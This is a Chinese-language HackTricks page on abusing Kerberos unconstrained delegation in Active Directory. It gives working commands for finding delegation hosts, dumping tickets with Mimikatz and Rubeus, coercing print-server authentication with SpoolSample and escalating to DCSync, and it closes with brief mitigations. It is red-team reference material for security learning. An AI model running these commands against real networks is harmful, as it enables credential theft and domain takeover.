Unconstrained Delegation

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

您在网络安全公司工作吗？想要看到您的公司在HackTricks中做广告吗？或者想要访问PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划!
发现PEASS家族，我们的独家NFT收藏品
获取官方PEASS和HackTricks周边产品
加入 💬 Discord群](https://discord.gg/hRep4RUj7f) 或 电报群 或在Twitter上关注我 🐦@carlospolopm。
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。

无限委派

这是域管理员可以设置给域内任何计算机的功能。然后，每当用户登录到计算机时，该用户的TGT副本将被发送到DC提供的TGS中并保存在LSASS中的内存中。因此，如果您在计算机上具有管理员权限，您将能够转储票证并冒充用户在任何计算机上。

因此，如果域管理员在启用了“无限委派”功能的计算机上登录，而您在该计算机上具有本地管理员权限，则您将能够转储票证并冒充域管理员（域提升）。

您可以通过检查userAccountControl属性是否包含ADS_UF_TRUSTED_FOR_DELEGATION来查找具有此属性的计算机对象。您可以使用LDAP过滤器‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’来执行此操作，这就是powerview所做的事情：

# 列出无限委派计算机
## Powerview
Get-NetComputer -Unconstrained #DCs总是出现但对于权限提升没有用
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# 使用Mimikatz导出票证
privilege::debug
sekurlsa::tickets /export #推荐的方法
kerberos::list /export #另一种方法

# 监视登录并导出新票证
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #每10秒检查新的TGTs

使用Mimikatz或Rubeus将管理员（或受害用户）的票证加载到内存中进行传递票证攻击。更多信息：https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ 有关无限委派的更多信息，请访问ired.team。

强制认证

如果攻击者能够入侵允许“无限委派”的计算机，他可以欺骗一个打印服务器自动登录到该计算机在服务器的内存中保存一个TGT。然后，攻击者可以执行传递票证攻击来冒充用户打印服务器计算机帐户。

要使打印服务器登录到任何计算机，您可以使用SpoolSample：

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

如果TGT来自域控制器，您可以执行DCSync攻击并从DC获取所有哈希。 有关此攻击的更多信息，请查看ired.team。

以下是尝试强制身份验证的其他方法：

pageForce NTLM Privileged Authentication

缓解

限制DA/Admin登录到特定服务
为特权帐户设置“帐户是敏感的，不能被委派”选项。

上一页Skeleton Key 下一页Windows Security Controls

最后更新于3个月前